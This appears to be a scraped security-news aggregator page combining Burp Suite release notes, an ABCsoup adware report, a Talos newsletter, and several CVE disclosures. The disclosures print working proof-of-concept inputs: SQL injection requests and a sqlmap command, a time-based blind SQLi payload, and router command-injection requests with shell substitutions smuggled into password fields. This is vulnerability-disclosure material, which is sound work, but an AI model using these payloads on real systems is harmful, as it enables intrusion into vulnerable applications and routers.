Today, Talos is publishing a glimpse into the most prevalent threats we've observed between July 1 and July 8. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics,...


[[ This is only the beginning! Please visit the blog for the complete entry ]]

Threat Roundup for July 1 to July 8

A URL disclosure issue was discovered in Burp Suite before 2022.6. If a user views a crafted response in the Repeater or Intruder, it may be incorrectly interpreted as a redirect.

show checksums

SHA256: {SHA FROM OPTION GOES HERE} MD5: {MD5 FROM OPTION GOES HERE}

This release introduces several improvements to the Intruder and Repeater tab bars, including the ability to select between a scrolling or wrapped tab view and, for Repeater, the ability to organize tabs into groups. It also introduces HTTP/1 keep-alive, in which Burp Suite can now reuse a single TCP connection to send multiple HTTP/1 requests, and adds a selection of preset scan modes to the **Scan Configuration** menu. Finally, we have released several key improvements for DOM Invader, including the ability to test for client-side prototype pollution.

**Grouped Tabs**

You can now organize Repeater tabs into color-coded groups. Grouping tabs makes it easier than ever to work with large numbers of open tabs and keep track of related requests.

We have also added a search function to the tab bar, which you can use to search for individual tabs or groups.

**Scrollable tab view**

Intruder and Repeater now provide two views for tabs. As well as the standard wrapped view, you can now also display tabs as a single, scrollable row. This can help to free up on-screen real estate, especially on smaller displays.

**DOM Invader improvements**

This release provides the following key improvements to DOM Invader:

*   You can now use DOM Invader to test for client-side prototype pollution.
*   The augmented **DOM** view now displays additional information to help you analyze vulnerabilities and potentially craft exploits. This includes the frame path, the outer HTML of the element, and the event that occurred when your payload was passed to the sink. Similarly, the **Messages** view now tells you both the frame that each message was sent from and the frame that it was sent to.
*   You can now set a callback function for each sink, source, and message that DOM Invader finds. This enables you to log the results using custom JavaScript code.
*   You can now prevent DOM Invader from consolidating messages with duplicate values. This is useful in cases where you want to see every single message being sent.
*   You can now disable specific sources and sinks to reduce noise.

For an overview of how to use these new features from PortSwigger researcher and creator of DOM Invader, Gareth Heyes, check out the following video:

**HTTP/1 keep-alive**

You can now send multiple HTTP/1 requests using the same TCP connection. Previously, Burp always closed the connection after each request / response pair, even if the server supported connection reuse.

Reusing connections in this way brings significant benefits in terms of request speed and timing accuracy.

To enable HTTP/1 keep-alive, go to **Project options > HTTP > HTTP/1** and select the **Use keep-alive for HTTP/1** if the server supports it option. You can override this setting in Repeater using the **Enable HTTP/1 keep-alive reuse** menu option.

**Preset scan modes**

You can now select from four preset scan modes when configuring a scan. These preset scan modes offer a quick way to adjust how the scan balances speed and coverage, without requiring you to set up a custom scan configuration.

To use these new scan modes, select **Use a preset scan mode** from the **Scan Configuration** menu and choose one of the available options.

**Other improvements**

We have made numerous improvements to Burp Scanner to improve stability, performance, and progress estimation.

**Security fixes**

This release provides the following security improvements:

*   We have upgraded Burp's browser to Chromium 102.0.5005.115, which fixes a number of high severity bugs.
*   We have resolved a low-severity security issue that could lead to Repeater and Intruder disclosing URLs due to incorrectly interpreting a crafted response as a redirect. This issue was privately reported to us via our bug bounty program.
*   We have hardened Burp’s Referer calculation, bringing it in line with the default Referrer-Policy settings used in modern browsers.

**Bug fixes**

This release also provides a number of bug fixes. Most notably:

*   Burp's browser no longer issues unnecessary requests to Google on launch.
*   We have fixed an issue whereby Repeater responses could be overwritten by long-running requests.
*   We have fixed an issue with logging in headless mode, whereby the log file was being created but no data was being written to the log.

CVE-2022-35406: Professional / Community 2022.6

A malicious browser extension with 350 variants is masquerading as a Google Translate add-on as part of an adware campaign targeting Russian users of Google Chrome, Opera, and Mozilla Firefox browsers.
Mobile security firm Zimperium dubbed the malware family ABCsoup, stating the "extensions are installed onto a victim's machine via a Windows-based executable, bypassing most endpoint security

A malicious browser extension with 350 variants is masquerading as a Google Translate add-on as part of an adware campaign targeting Russian users of Google Chrome, Opera, and Mozilla Firefox browsers.

Mobile security firm Zimperium dubbed the malware family **ABCsoup**, stating the "extensions are installed onto a victim's machine via a Windows-based executable, bypassing most endpoint security solutions, along with the security controls found in the official extension stores."

The rogue browser add-ons come with the same extension ID as that of Google Translate — "aapbdbdomjkkjkaonfhkkikfgjllcleb" — in an attempt to trick users into believing that they have installed a legitimate extension.

The extensions are not available on the official browser web stores themselves. Rather they are delivered through different Windows executables that install the add-on on the victim's web browser.

In the event the targeted user already has the Google Translate extension installed, it replaces the original version with the malicious variant owing to their higher version numbers (30.2.5 vs. 2.0.10).

"Furthermore, when this extension is installed, Chrome Web Store assumes that it is Google Translate and not the malicious extension since the Web Store only checks for extension IDs," Zimperium researcher Nipun Gupta said.

All the observed variants of the extension are geared towards serving pop-ups, harvesting personal information to deliver target-specific ads, fingerprinting searches, and injecting malicious JavaScript that can further act as a spyware to capture keystrokes and monitor web browser activity.

The main function of ABCsoup entails checking for Russian social networking services like Odnoklassniki and VK among the current websites opened in the browser, and if so, gather the users' first and last names, dates of birth, and gender, and transmit the data to a remote server.

Not only does the malware use this information to serve personalized ads, the extension also comes with capabilities to inject custom JavaScript code based on the websites opened. This includes YouTube, Facebook, ASKfm, Mail.ru, Yandex, Rambler, Avito, Brainly's Znanija, Kismia, and rollApp, suggesting a heavy Russia focus.

Zimperium attributed the campaign to a "well-organized group" of Eastern European and Russian origin, with the extensions designed to target Russian users given the wide variety of local domains targeted.

"This malware is purposefully designed to target all kinds of users and serves its purpose of retrieving user information," Gupta said. "The injected scripts can be easily used to serve more malicious behavior into the browser session, such as keystroke mapping and data exfiltration."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Experts Uncover 350 Browser Extension Variants Used in ABCsoup Adware Campaign

Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-30192, CVE-2022-33638, CVE-2022-33639.

CVE-2022-33680

Online Accreditation Management v1.0 was discovered to contain a SQL injection vulnerability via the USERNAME parameter at process.php.

**Online-Accreditation-Management-System-v1.0-SQLi******Online Accreditation Management System v1.0 - SQLi******Vendor**

**Description:**

The vulnerability page is process.php

http://your-ip/AccreditationSystem/

Online Accreditation Management System v1.0

The USERNAME parameter in the process.php page appears to be vulnerable to SQL injection attacks.

\[+\]sqlmap:

Save the POST request package in 1.txt, and then run the sqlmap

python sqlmap.py -r 1.txt  --dbs

\[+\]POST request package

    POST /AccreditationSystem/process.php?action=loginagency HTTP/1.1
    Host: 10.211.55.3
    Content-Length: 40
    Accept: text/plain, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.61 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://10.211.55.3
    Referer: http://10.211.55.3/AccreditationSystem/
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=kc1vvdqjtt94b9i5461cf4s5r2
    Connection: close
    
    USERNAME=ff%E9%8E%88%27%22%5C%28&PASS=ff
    

**In action:**

**Proof and Exploit:**

watch the video here

CVE-2022-32056: GitHub - JackyG0/Online-Accreditation-Management-System-v1.0-SQLi

Inout Homestay v2.2 was discovered to contain a SQL injection vulnerability via the guests parameter at /index.php?page=search/rentals.

**Information**

    Vulnerability Name  : Remote Blind SQL Injections in Inout Homestay
    Product             : Inout Homestay
    version             : 2.2
    Date                : 2022-05-26
    Vendor Site         : https://www.inoutscripts.com/products/inout-homestay/
    POC                 : https://github.com/bigb0x/CVEs/blob/main/Inout-Homestay-2-2-sqli.md
    CVE-Number          : In Progess
    Exploit Author      : Mohamed N. Ali @MohamedNab1l
    

  
**Description**

Inout Homestay Version 2.2 suffers from time-based blind SQL injection. POST parameters "guests" is vulnerable to SQL imjection attacks.This will allow remote non-authenticated attackers to inject SQL code. This could result in full information disclosure.  

**Vulnerable Parameter: guests (POST)**

Vulnerability: time-based blind SQL injection in guests (POST) parameter. Vulnerabile file: index.php  

**Payload**

address\=3137 Laguna Street&guests\=1' AND (SELECT 1769 FROM (SELECT(SLEEP(5)))XPZb) AND
'ADfU'\='ADfU&indate\=01/01/1967&lat\=1&location\=1&long\=1&outdate\=01/01/1967&searchcity\=San Francisco&searchstate\=NY

  
**HTTP Post Request**

POST /index.php?page\=search/rentals HTTP/1.1
Content\-Type: application/x\-www\-form\-urlencoded
X\-Requested\-With: XMLHttpRequest
Referer: http://vlun\-host.com/
Cookie: currencyid\=10; currencycode\=BYR; language\=2; io\_lang\_code\=es
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Encoding: gzip,deflate,br
Content-Length: 189
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36
Host: vlun-host.com
Connection: Keep-alive
address=3&guests=-1 \[inject\_sql\_here\]&indate=01/01/1967&lat=1&location=1&long=1&outdate=01/01/1967&searchcity=San%20Francisco&searchstate=NY

  
**POC: sqlmap command:**

python sqlmap.py \-r homestay.txt  \-p guests \--dbms=MySQL --banner --random-agent --current-db --dbs --current-user

  
**output:**

  
**Timeline**

    2022-05-03: Discovered the bug
    2022-05-03: Reported to vendor
    2022-05-22: Advisory published
    

  
**Discovered by**

    Mohamed N. Ali
    @MohamedNab1l
    ali.mohamed[at]gmail.com

CVE-2022-32055: CVEs/Inout-Homestay-2-2-sqli.md at main · bigb0x/CVEs

By Jon Munshaw. 
Welcome to this week’s edition of the Threat Source newsletter. 
I’ve been thinking a lot recently about the pros and cons of the way we publicize our threat research. I had a few conversations at Cisco Live with people — who are more generally IT-focused than...


[[ This is only the beginning! Please visit the blog for the complete entry ]]

_By Jon Munshaw._ 

Welcome to this week’s edition of the Threat Source newsletter. 

I’ve been thinking a lot recently about the pros and cons of the way we publicize our threat research. I had a few conversations at Cisco Live with people — who are more generally IT-focused than hyper-focused on cybersecurity — about the amount of information we share on our blog and social media profiles. Our blog serves as the main mouthpiece for Talos, but I’m also always talking to our audience, directly or indirectly, through social media channels, our podcasts, or out in the world at conferences. But during these conversations, readers may wonder if we’re indirectly “helping” the bad guys by pointing out what they’re doing wrong or what we are doing to track them. 

There will always be pros and cons to any type of disclosure of information at this level of cybersecurity. But it’s important to know that we don’t take this issue lightly. When we publicize a technique — whether it be in a blog post, conference talk or podcast — those attackers are actively using, it forces them to change tactics and take time to make tweaks and changes. Unfortunately, we alone do not have the power to bring an end to cybercrime. However, if we can increase the cost of doing business for a threat actor, it's a win for defenders and potential victims. As defenders, we must keep attackers out of their comfort zone and force them to innovate or perish. Without that information being out there publicly, these bad actors could keep using the same tactics indefinitely to infect other targets. 

This is by no means an easy decision to make, it’s a fine line all cybersecurity defenders must continually walk. But as we’ve pointed out several times, cybersecurity is a team sport. Prior to publishing any blog post, we take several steps to make sure everyone is on the same page, including victim notifications and information sharing with our partners like the Cyber Threat Alliance. I think we should all play on the same team and provide our teammates with as much information as possible so they’re ready for game time. To continue the analogy, information sharing with the public allows under-resourced teams to take action to defend themselves without needing to further strain their budgets and people.  

It does us no good to either keep this information to ourselves and try to go out on our own and single-handedly defeat these threat actors because that’s never going to work. And it also doesn’t make sense to be super competitive. We always seek to protect our customers first and foremost, and that includes responsible disclosure policies from our vulnerability management team to our threat researchers. Our intelligence pushes research and defenders forward, and we will always seek to arm them with as much information as possible.  

**The one big thing **

U.S. federal agencies unveiled a great deal about the MedusaLocker ransomware group last week with a joint advisory on the attackers’ operations. The U.S. Cybersecurity Infrastructure Security Agency, FBI and others shared several IOCs related to the actor, warning that they’ve spotted a recent uptick in MedusaLocker’s operations. MedusaLocker gains access to victim devices through vulnerable Remote Desktop Protocol (RDP) configurations or with malicious phishing and spam emails. Once on the targeted system, the attackers encrypt a victim’s files and await ransom payment while propagating across the network. 

> **Why do I care? **Cisco Talos first observed MedusaLocker operating in 2019. Clearly, the group has only expanded its operations since then and is now part of the massive ransomware-as-a-service industry that features several major threat actors. This group made its name by targeting health care organizations during the COVID-19 pandemic, but CISA’s advisory states any industry could be a target. The advisory includes new information on potential mitigations for this malware family, along with known IOCs to block associated with the group.   
> **So now what? **In addition to implementing the mitigations outlined in the advisory, Cisco Secure also has several options available to defend against this attack. There are multiple Snort rules that detect this ransomware’s activity along with several ClamAV signatures. As with all ransomware activity, it’s important to have physical backups on hand in the event of an attack so you can recover quickly. And you can always be prepared for the worst with a Cisco Talos Incident Response plan and/or playbook. 

**Other news of note**

The North Korean state-sponsored actor Lazarus Group is suspected to be behind a recent $100 million cryptocurrency theft. Members of the group allegedly exploited the Harmony Horizon Bridge software that allows users to trade virtual currency between the Harmony blockchain and other blockchains. Attackers obtained username and passwords of Harmony employees that they then used to break into the bridge and deploy several money laundering techniques to hide their actions. The tactics in this case are similar to another attack in April in which attackers stole $600 million from Ronin Bridge. (Bloomberg, Fortune) 

Bad actors are creating fake job applications and attending virtual interviews with deepfake videos. A new warning from the FBI states the adversaries are trying to obtain contractor-level jobs at technology companies, likely to steal sensitive information or make money illegitimately. These fake applicants use stolen identities, fake videos and doctored voices during the application process, including adding in what seem like normal human coughing, sneezing and blinking. The FBI recommends that recruiters or hiring managers look out for telltale signs of deepfake videos like sounds that do not line up with the video on the screen or unnatural lip movements. (TechCrunch, Gawker) 

Google is warning of a high-severity vulnerability in the Chrome web browser for Android that is actively being exploited in the wild. CVE-2022-2294 is a heap buffer overflow bug that, if exploited, could lead to denial-of-service attacks or arbitrary code execution. The company released a security update to patch the vulnerability this week. This update also includes fixes for another high-severity vulnerability (CVE-2022-2295) and an unspecified internal issue discovered. This is the fourth zero-day vulnerability to pop up in Chrome this year. (Dark Reading, Decipher) 

**Can’t get enough Talos? **

*   Talos Takes Ep. #102: Unmasking ransomware groups on the dark web
*   Researcher Spotlight: Around the security world and back again with Nick Biasini
*   Researchers Share Techniques to Uncover Anonymized Ransomware Sites on Dark Web

  

**Upcoming events where you can find Talos **

**A New HOPE** (July 22 - 24, 2022)  
New York City 

**BlackHat** **U.S.** (Aug. 6 - 11, 2022)  
Las Vegas, Nevada 

**DEF CON U.S.** (Aug. 11 - 14, 2022)  
Las Vegas, Nevada 

**Most prevalent malware files from Talos telemetry over the past week  **

**MD5:** 2915b3f8b703eb744fc54c81f4a9c67f   

**Typical Filename:** VID001.exe   

**Claimed Product:** N/A   

**Detection Name:** Win.Worm.Coinminer::1201 

**MD5:** 2c8ea737a232fd03ab80db672d50a17a    

**Typical Filename:** LwssPlayer.scr    

**Claimed Product:** 梦想之巅幻灯播放器    

**Detection Name:** Auto.125E12.241442.in02    

**MD5:** 10f1561457242973e0fed724eec92f8c    

**Typical Filename:** ntuser.vbe    

**Claimed Product:** N/A    

**Detection Name:** Auto.1A234656F8.211848.in07.Talos   

**MD5:** a7742a6d7d8b39f1a8cdf7f0b50f12bb    

**Typical Filename:** wrsanvs.exe  

**Claimed Product:** N/A      

**Detection Name:** W32.Auto:91e994229a.in03.Talos

Threat Source newsletter (July 7, 2022) — Teamwork makes the dream work

The Appfire Jira Misc Custom Fields (JMCF) app 2.4.6 for Atlassian Jira allows XSS via a crafted project name to the Add Auto Indexing Rule function.

\-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2022-039 Product: Jira Misc Custom Fields (JMCF) Manufacturer: Appfire Affected Version(s): 2.4.6 Tested Version(s): 2.4.6 Vulnerability Type: Stored Cross-Site Scripting (CWE-79) Risk Level: Medium Solution Status: Closed Manufacturer Notification: 2022-05-27 Solution Date: 2022-06-29 Public Disclosure: 2022-07-07 CVE Reference: CVE-2022-32567 Author of Advisory: Lukas Faiß, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: Jira Misc Custom Fields (JMCF) is an add-on for Jira to perform custom calculations. The manufacturer describes the product as follows (see \[1\]): "JMCF by Appfire lets you easily expose 'hidden' issue information and create calculations - from simple math operations to sophisticated Groovy scripts." Due to insufficient input validation of user-provided input, JMCF is vulnerable to cross-site scripting (XSS) attacks. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: The 'Add Auto Indexing Rule' function is prone to a stored XSS attack. XSS vulnerabilities allow an attacker to embed malicious JavaScript code into server replies which is later executed in the browsers of other users. By executing JavaScript, attackers can, for example, perform actions in the context of other logged-in users. For testing purposes, the add-on of the manufacturer\[1\] was used in a local Jira Server\[4\] installation. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): The combo box project selection within the 'Add Auto Indexing Rule' function is vulnerable to an XSS attack. If a project with the name "Pent" is created, it will be loaded via the following request when loading the projects: GET /rest/jmcf/1/project/picker?query=&maxResults=1000&showAvatar=true HTTP/2 Host: \[REDACTED\] Cookie: Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="101", "Google Chrome";v="101" Accept: application/json, text/javascript, \*/\*; q=0.01 X-Requested-With: XMLHttpRequest Sec-Ch-Ua-Mobile: ?0 User-Agent: Sec-Ch-Ua-Platform: "Linux" Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://\[REDACTED\]/secure/JMCFEditIndexingRule!Default.jspa?id= Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 The response contains the project names. Within this page, the malicious code is now being executed. Here is a line of the response that contains the malicious stored project name: ,{ "name":"PentProj (PSOPPPP)", "key":"PSOPPPP", "html":"PentProj (PSOPPPP)" }, ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: Context-sensitive HTML encoding of project names. More information: https://cheatsheetseries.owasp.org/cheatsheets/Cross\_Site\_Scripting\_ Prevention\_Cheat\_Sheet.html ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2022-05-12: Vulnerability discovered 2022-05-27: Vulnerability reported to manufacturer 2022-06-29: Patch released by manufacturer 2022-07-07: Public disclosure of vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: \[1\] Product website for Jira Misc Custom Fields (JMCF) https://marketplace.atlassian.com/apps/27136/jira-misc-custom-fields-jmcf?hosting=server&tab=overview \[2\] SySS Security Advisory SYSS-2022-039 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-039.txt \[3\] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy \[4\] Jira Core Server https://www.atlassian.com/software/jira/core/download ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Lukas Faiß of SySS GmbH. E-Mail: lukas.faiss@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Lukas\_Fai%C3%9F.asc Key Fingerprint: A145 2068 8E74 5053 A7BE 97C3 D78E AE2E B739 3EEA ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEEoUUgaI50UFOnvpfD146uLrc5PuoFAmLFP9EACgkQ146uLrc5 Pup4yw//QVBRL7vL1QJBPZKUh3tQDka1+1yjOt/IixC1WoccjwTT6Zv+Pb2C8bEJ vCeoqQfBGQeVbiqVaMEiora9ijbDZLorDhjK8UIa3nUGzXGSqgiGJoxDHSe3q1Vr KKOMDqslQP5Zb5CowVtqcNww/ulWm+brr+w6e+sHkc7ibsTPeZaZdh82vqHFs+rb bxcshi+H5kI+QqzKjyP+d+bKoFRbEiKqYX+SRxgY+dY8nGDN3WPIlHie597Jni/M 8QeEjo6owb4QapF7A9emb0PsxJte3nZNeB0NzeHeW0b990Jczl5a4aRZrqKLUq6b Qrmq8Fe8dxr7Gz9btSBFOlbv8B+hSyQNsjvolcjr+0G5czDp6vPvFfP2csJX8hb7 +68xqA5SqL1WBMIWnlddJMC1vknQHvnDkHzl45DPWIWFPMSrBDodQ+A0VkeYe+rd F6jNw2DVXp7Ln2Z2n/OdbhK6+qsLXRB3s6l6sbCsxAI3pvBnNvvq3MjpzBpCvoP4 KvBgu23nucCGGhk3cVWc2iEEcS2aG6FRljiKoYy0+FveyUrB52sTMlD7JttAvgD1 JLJ1df2gDjQ4UOfwaGSl2rQDKWu7M6pxG5jLNvqU1FnQHzlJ8xMaA4K6t3b/oFi8 IKoE7A1LLmkgNpKtqYwFLgVgF+kBro7JYW0NnqXvn92tAXTvQyI= =ZLwT -----END PGP SIGNATURE-----

CVE-2022-32567

Tenda AX1803 v1.0.0.1_2890 was discovered to contain a command injection vulnerability via the function setipv6status.

#_**\* Tenda ax1803 has a command injection vulnerability\***_

##\* \* \* \\ \* overview\*\*\*\*

• \*\*\*\*\* type \\ \*\*\*\*: command injection vulnerability

• \* \* \* \\ \* supplier \\ \* \* \* \*: Tengda（ https://tenda.com.cn ）

• \*\*\*\*\* product \*\*\*\*: WiFi router ax1803

• _**\*Firmware download address：\***_ https://www.tenda.com.cn/download/detail-3225.html

• \*\*\*\*Firmware download address：\*\*\*\*https://down.tenda.com.cn/uploadfile/AX1803/US\_AX1803v2.1br\_v1.0.0.1\_2890\_CN\_ZGYD01.zip

Tendaax1803 router adopts WiFi 6 (802.11ax) technology, and the dual band concurrency rate is up to 1775mbps (2.4ghz:574mbps, 5ghz:1201mbps). Compared with the ac1200 router of the previous generation WiFi 5 standard, the wireless rate is increased by 50% and the transmission distance is longer; Equipped with 1.5GHz high-performance quad core processor, the network load capacity is comprehensively improved, data forwarding is faster, and long-term operation is more stable; Using ofdma+mu-mimo technology, more devices can access the Internet at the same time, the transmission efficiency is significantly improved, the delay is significantly reduced, and the online games and ultra clear videos for multiple people are more fluent. It is the first choice for building a multimedia home network! Command Execution Vulnerability in setipv6status

##\* \* \* \\ \* description\*\*\*\*

###_**\* I. product information:\***_

Overview of the latest version of Tenda ax1803 router simulation:

\### _**\*2. Vulnerability details\***_

Tenda ax1803 is found to have a command injection vulnerability in the setipv6status function

When we set connect type = ' PPPoE ', we will get a command injection vulnerability after logging in.

\## _**\*3. Recurring vulnerabilities and POCS\***_

To reproduce the vulnerability, the following steps can be followed:

Start firmware through QEMU system or other methods (real machine)

Attack with the following POC attacks

Note to replace the password field in the cookie

    POST /goform/setIPv6Status HTTP/1.1
    Host: 192.168.2.1
    Connection: close
    Content-Length: 191
    sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="98", "Google Chrome";v="98"
    Accept: */*
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.109 Safari/537.36
    sec-ch-ua-platform: "macOS"
    Origin: https://192.168.2.1
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: https://192.168.2.1/main.html
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: password=edeff4d6d98974e46457a587e2e724a2ndy5gk
    
    IPv6En=1&conType=PPPoE&ISPusername=addasdas&ISPpassword=$(ls > /tmp/xxx)&prefixDelegate=0&wanAddr=%2F&gateWay=&lanType=undefined&wanPreDNS=&wanAltDNS=&lanPrefix=undefined%2F64

CVE-2022-34595: IOT_Vul/readme_en.md at main · zhefox/IOT_Vul

Tenda AX1806 v1.0.0.1 was discovered to contain a command injection vulnerability via the function WanParameterSetting.

**\*\*\* Command Injection Vulnerability in Tenda AX1806 \*\*****_**\*Overview\***_**

*   _**\*Type\***_: Command Injection Vulnerability
    
*   _**\*Supplier\***_: Tenda ( https://tenda.com.cn )
    
*   \*\*\*Product\*\*: WiFi router AX1806
    
*   Firmware download address: \*\*\*\* https://www.tenda.com.cn/download/detail-3306.html
    
*   Firmware download address: \*\*\*\* https://down.tenda.com.cn/uploadfile/AX1806/US\_AX1806V21brv1001cn2988ZGDX01.zip
    

Tenda AX1806 uses a new generation of WIFI6 (802.11ax) technology, and combines higher number of subcarriers and 1024QAM modulation technology. Compared with wifi-5 routers, dual-band wireless internet access rate is greatly improved. WanParameterSetting has a Command Execution Vulnerability

**_**\*Description\***_****\*_**1, Product Information:\***_**

Overview of the latest version of Tenda AX1806 router simulation:

\### \*_**2\. Vulnerability Details\***_

Tenda AX1806 was found to have a command injection vulnerability in the WanParameterSetting function

The non-zero is true, and when we change the adslPwd parameter, we get a command injection vulnerability after setting it.

**_**\*3. Recurring loopholes and POC\***_**

To reproduce the vulnerability, the following steps can be followed:

Start firmware (real machine) via qemu-system or other means

Attack using the following POC attacks

Note the replacement of password fields in cookies

    POST /goform/WanParameterSetting?0.8762489734485668 HTTP/1.1
    Host: i92.168.68.150
    Connection: close
    Content-Length: 191
    sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="98", "Google Chrome";v="98"
    Accept: */*
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.109 Safari/537.36
    sec-ch-ua-platform: "macOS"
    Origin: https://i92.168.68.150
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: https://192.168.2.1/main.html
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: password=edeff4d6d98974e46457a587e2e724a2ndy5gk
    
    wanType=2&adslUser=aaaa&adslPwd=$(ls > /tmp/xxx)&vpnServer=&vpnUser=&vpnPwd=&vpnWanType=l&dnsAuto=1&staticIp=&mask=&gateway=&dnsl=&dns2=&module=wanl&downSpeedLimit=

Tag

#chrome